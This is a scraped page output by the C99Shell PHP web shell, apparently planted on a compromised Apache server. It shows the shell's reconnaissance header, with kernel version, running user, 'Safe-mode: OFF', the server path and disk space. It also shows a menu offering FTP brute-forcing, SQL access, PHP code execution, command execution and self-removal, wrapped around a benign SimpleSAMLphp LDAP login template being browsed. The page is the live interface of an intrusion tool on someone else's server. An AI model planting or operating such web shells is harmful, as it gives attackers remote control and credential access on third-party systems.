!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/apex_tdfonline/php/3ros/simplesamlphp/templates/   drwxr-xr-x
Free 11.96 GB of 61.93 GB (19.31%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     login-ldapmulti.php (2.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
    $this
->includeAtTemplateBase('includes/header.php'); 
?>


        <?php if (isset($this->data['error'])) { ?>
        <div style="border-left: 1px solid #e8e8e8; border-bottom: 1px solid #e8e8e8; background: #f5f5f5">
        <img src="/<?php echo $this->data['baseurlpath']; ?>resources/icons/experience/gtk-dialog-error.48x48.png" class="float-l erroricon" style="margin: 15px " />
        <h2><?php echo $this->t('error_header'); ?></h2>
        
        <p class="logintext"><?php echo htmlspecialchars($this->data['error']); ?> </p>
        </div>
        <?php ?>
    
        <h2 style="break: both"><?php echo $this->t('user_pass_header'); ?></h2>
        
        <p>
            <?php echo $this->t('user_pass_text'); ?>
        </p>
        
        <form action="?" method="post" name="f">

        <table>
            <tr>
                <td rowspan="3"><img src="/<?php echo $this->data['baseurlpath']; ?>resources/icons/experience/gtk-dialog-authentication.48x48.png" id="loginicon" /></td>
                <td style="padding: .3em;"><?php echo $this->t('username'); ?></td>
                <td><input type="text" tabindex="1" name="username" 
                    <?php if (isset($this->data['username'])) {
                        echo 
'value="' htmlspecialchars($this->data['username']) . '"';
                    } 
?> /></td>

                    
                <td style="padding: .4em;" rowspan="3">
                    <input type="submit" tabindex="3" id="regularsubmit" value="<?php echo $this->t('login_button'); ?>" />
                    <input type="hidden" name="RelayState" value="<?php echo htmlspecialchars($this->data['relaystate']); ?>" />
                </td>
            </tr>
            
            <tr>
                <td style="padding: .3em;"><?php echo $this->t('organization'); ?></td>
                <td><select name="org" tabindex="2">
                    <?php
                    
                    
foreach ($this->data['ldapconfig'] AS $key => $entry) {
                        echo 
'<option ' .
                            (
$key == $this->data['org'] ? 'selected="selected" ' '')
                            . 
'value="' htmlspecialchars($key) . '">' htmlspecialchars($entry['description']) . '</option>';
                    }
                    
                    
?>
                </select></td>
            </tr>
            
            <tr>
                <td style="padding: .3em;"><?php echo $this->t('password'); ?></td>
                <td><input type="password" tabindex="2" name="password" /></td>
            </tr>
        <tr><td></td><td>
        <input type="submit" tabindex="5" id="mobilesubmit" value="<?php echo $this->t('login_button'); ?>" />
        </td></tr>
        </table>
        
        
        </form>
        
        
        <h2 class="logintext"><?php echo $this->t('help_header'); ?>.</h2>
        
        
        <p class="logintext"><?php echo $this->t('help_text'); ?>!</p>
        
        
        
<?php $this->includeAtTemplateBase('includes/footer.php'); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.2836 ]--